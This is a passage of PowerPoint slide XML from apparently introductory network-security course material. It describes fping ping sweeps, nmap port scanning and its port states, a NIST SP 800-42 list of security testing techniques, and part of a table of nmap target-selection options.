          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> command to do ping </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>sweeping</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Normal ping command, only sends ICMP echo request to a single IP or host, at a time. However </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> can be used to send ICMP echo request to a large number of hosts.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3016348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Screen shot 2015-02-18 at 7.52.1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6057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29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Screen shot 2015-02-18 at 8.00.5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0"/>
            <a:ext cx="8550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51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A network exploration tool and security/port scanner.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>esigned </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to rapidly scan large </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>networks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>or a single host to determine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>what hosts are available on the network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What services(application name and version) those hosts are offering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What operating system </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(and OS versions) they are running</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What type of packet filters/firewalls are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>in use</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>OS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>versions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>they are running</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38274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(cont.)</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a:t>The output from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is a list of scanned </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>targets in a table, listing </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>port number </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>and protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>service name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>tate: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>filtered</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>closed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>unfiltered</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="446574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81000"/>
            <a:ext cx="8229600" cy="762000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" i="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="DDDDDD"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Security Testing Techniques</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24579" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="1524000"/>
            <a:ext cx="7239000" cy="4038600"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:alpha val="49001"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Network Scanning </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Vulnerability Scanning </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Password Cracking </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Log Review </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Integrity Checkers </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Virus Detection </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>War Dialing </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>War Driving (802.11 or wireless LAN testing) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Penetration Testing </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24580" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="5715000"/>
            <a:ext cx="7696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a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Often, several of these testing techniques are used together to gain more comprehensive assessment of the overall network security posture.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23556" name="Line 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1295400"/>
            <a:ext cx="8001000" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="50800" cmpd="dbl">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2" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5318125" y="2833688"/>
            <a:ext cx="2681288" cy="3968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solidFill>
                  <a:srgbClr val="0000EC"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>(NIST SP 800-42, 2003)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="271386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(cont.)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1412875"/>
            <a:ext cx="8229600" cy="5445125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> means that an application on the target machine is listening for connections/packets on that port.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Filtered</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> means that a firewall, filter, or other network obstacle is blocking the port so that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> cannot tell whether it is open or closed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Closed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> ports have no application listening on them, though they could open up at any time.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Unfiltered </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>means that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>'s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> probes are responsive from ports, but </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> cannot determine whether they are open or closed.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1571026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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="323850" y="260350"/>
          <a:ext cx="8229600" cy="4831645"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="4114800"/>
                <a:gridCol w="4114800"/>
              </a:tblGrid>
              <a:tr h="370891">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="353535"/>
                          </a:solidFill>
                          <a:latin typeface="Verdana"/>
                        </a:rPr>
                        <a:t>-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="353535"/>
                          </a:solidFill>
                          <a:latin typeface="Verdana"/>
                        </a:rPr>
                        <a:t>iL</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="353535"/>
                          </a:solidFill>
                          <a:latin typeface="Verdana"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" i="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="353535"/>
                          </a:solidFill>
                          <a:latin typeface="Verdana"/>
                        </a:rPr>
                        <a:t>&lt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" i="1" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="353535"/>
                          </a:solidFill>
                          <a:latin typeface="Verdana"/>
                        </a:rPr>
                        <a:t>inputfilename</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" i="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="353535"/>
                          </a:solidFill>
                          <a:latin typeface="Verdana"/>
                        </a:rPr>
                        <a:t>&gt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" i="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="353535"/>
                          </a:solidFill>
                          <a:latin typeface="Verdana"/>
                        </a:rPr>
                        <a:t>	</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45726" marB="45726"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" i="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="353535"/>
                          </a:solidFill>
                          <a:latin typeface="Verdana"/>
                        </a:rPr>
                        <a:t>Input from list of hosts/networks	</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45726" marB="45726"/>
                </a:tc>
              </a:tr>
              <a:tr h="579200">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" i="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="353535"/>
                          </a:solidFill>
                          <a:latin typeface="Verdana"/>
                        </a:rPr>
                        <a:t>-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" i="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="353535"/>
                          </a:solidFill>
                          <a:latin typeface="Verdana"/>
                        </a:rPr>
                        <a:t>iR</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" i="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="353535"/>
                          </a:solidFill>
                          <a:latin typeface="Verdana"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" i="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="353535"/>
                          </a:solidFill>
                          <a:latin typeface="Verdana"/>
                        </a:rPr>
                        <a:t>&lt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" i="1" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="353535"/>
                          </a:solidFill>
                          <a:latin typeface="Verdana"/>
                        </a:rPr>
                        <a:t>num</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" i="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="353535"/>
                          </a:solidFill>
                          <a:latin typeface="Verdana"/>
                        </a:rPr>
                        <a:t> hosts&gt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" i="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="353535"/>
                          </a:solidFill>
                          <a:latin typeface="Verdana"/>
                        </a:rPr>
                        <a:t>	</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45726" marB="45726"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" i="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="353535"/>
                          </a:solidFill>
                          <a:latin typeface="Verdana"/>
                        </a:rPr>
                        <a:t>Choose random targets			</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" i="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="353535"/>
                          </a:solidFill>
                          <a:latin typeface="Verdana"/>
                        </a:rPr>
                        <a:t>		</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45726" marB="45726"/>
                </a:tc>
              </a:tr>
              <a:tr h="579200">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" i="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="353535"/>
                          </a:solidFill>
                          <a:latin typeface="Verdana"/>
                        </a:rPr>
                        <a:t>--exclude</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" i="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="353535"/>
                          </a:solidFill>
                          <a:latin typeface="Verdana"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" i="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="353535"/>
                          </a:solidFill>
                          <a:latin typeface="Verdana"/>
                        </a:rPr>
                        <a:t>&lt;host1[,host2][,host3],...&gt;</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="0" i="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:srgbClr val="353535"/>
                        </a:solidFill>
                        <a:latin typeface="Verdana"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45726" marB="45726"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" i="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="353535"/>
                          </a:solidFill>
                          <a:latin typeface="Verdana"/>
                        </a:rPr>
                        <a:t>Exclude hosts/networks</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45726" marB="45726"/>
                </a:tc>
              </a:tr>
              <a:tr h="370891">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" i="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="353535"/>
                          </a:solidFill>
                          <a:latin typeface="Verdana"/>
                        </a:rPr>
                        <a:t>--</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" i="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="353535"/>
                          </a:solidFill>
                          <a:latin typeface="Verdana"/>
                        </a:rPr>
                        <a:t>excludefile</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" i="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="353535"/>
                          </a:solidFill>
                          <a:latin typeface="Verdana"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" i="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="353535"/>
                          </a:solidFill>
                          <a:latin typeface="Verdana"/>
                        </a:rPr>
                        <a:t>&lt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" i="1" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="353535"/>
                          </a:solidFill>
                          <a:latin typeface="Verdana"/>
                        </a:rPr>
                        <a:t>exclude_file</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" i="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="353535"/>
                          </a:solidFill>
                          <a:latin typeface="Verdana"/>
                        </a:rPr>
                        <a:t>&gt;</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="0" i="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:srgbClr val="353535"/>
                        </a:solidFill>
                        <a:latin typeface="Verdana"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45726" marB="45726"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" i="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="353535"/>
                          </a:solidFill>
                          <a:latin typeface="Verdana"/>
                        </a:rPr>
                        <a:t>Exclude list from file</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45726" marB="45726"/>
                </a:tc>
              </a:tr>
              <a:tr h="579200">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="353535"/>
                          </a:solidFill>
                          <a:latin typeface="Verdana"/>
                        </a:rPr>
                        <a:t>-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="353535"/>
                          </a:solidFill>
                          <a:latin typeface="Verdana"/>
                        </a:rPr>
                        <a:t>sL</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="353535"/>
                          </a:solidFill>
                          <a:latin typeface="Verdana"/>
                        </a:rPr>
                        <a:t>		</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45726" marB="45726"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="353535"/>
                          </a:solidFill>
                          <a:latin typeface="Verdana"/>
                        </a:rPr>
                        <a:t>List Scan - simply list targets to scan	</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45726" marB="45726"/>
                </a:tc>
              </a:tr>
              <a:tr h="579200">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="353535"/>
                          </a:solidFill>
                          <a:latin typeface="Verdana"/>
                        </a:rPr>
                        <a:t>	</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="353535"/>
                          </a:solidFill>
                          <a:latin typeface="Verdana"/>
                        </a:rPr>
                        <a:t>-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="353535"/>
                          </a:solidFill>
                          <a:latin typeface="Verdana"/>
                        </a:rPr>
